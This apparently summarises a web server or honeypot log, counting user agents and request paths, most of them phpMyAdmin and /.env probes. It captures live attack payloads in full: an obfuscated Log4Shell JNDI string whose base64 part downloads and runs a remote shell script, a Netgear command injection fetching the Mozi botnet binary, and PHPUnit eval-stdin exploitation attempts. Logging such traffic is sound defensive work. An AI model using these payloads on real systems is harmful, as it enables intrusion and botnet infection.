5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0`
21	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198[.]199[.]73[.]83:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoIC1vIGFrdHVhbGlzaWVyZW4uc2g7IHdnZXQgaHR0cDovLzE5OS4xOTUuMjUzLjE4Ny9ha3R1YWxpc2llcmVuLnNoOyBjaG1vZCA3NzcgYWt0dWFsaXNpZXJlbi5zaDsgc2ggYWt0dWFsaXNpZXJlbi5zaDsgcm0gLXJmIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoLjE=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
5		`\x03`
20		`\x16\x03\x01`
21	GET	`/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?id=`	HTTP/1.1
1	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/phpMyAdmin/index.php?lang=en`	HTTP/1.1
3	GET	`/admin/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
1	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
3	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/index.php?lang=en`	HTTP/1.1
3	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/db/websql/index.php?lang=en`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
3	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/web/index.php?lang=en`	HTTP/1.1
3	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.10-all-languages/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.3/index.php?lang=en`	HTTP/1.1
4	GET	`/phpMyAdmin-5.2.0-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.0/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-5.3.0-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.3.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-latest-all-languages/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
101	GET	`/phpmyadmin/`	HTTP/1.1
2	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2011/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2014/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2022/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/phppma/index.php?lang=en`	HTTP/1.1
3	GET	`/pma/index.php?lang=en`	HTTP/1.1
3	GET	`/program/index.php?lang=en`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]93[.]29[.]229:51937/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
4	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0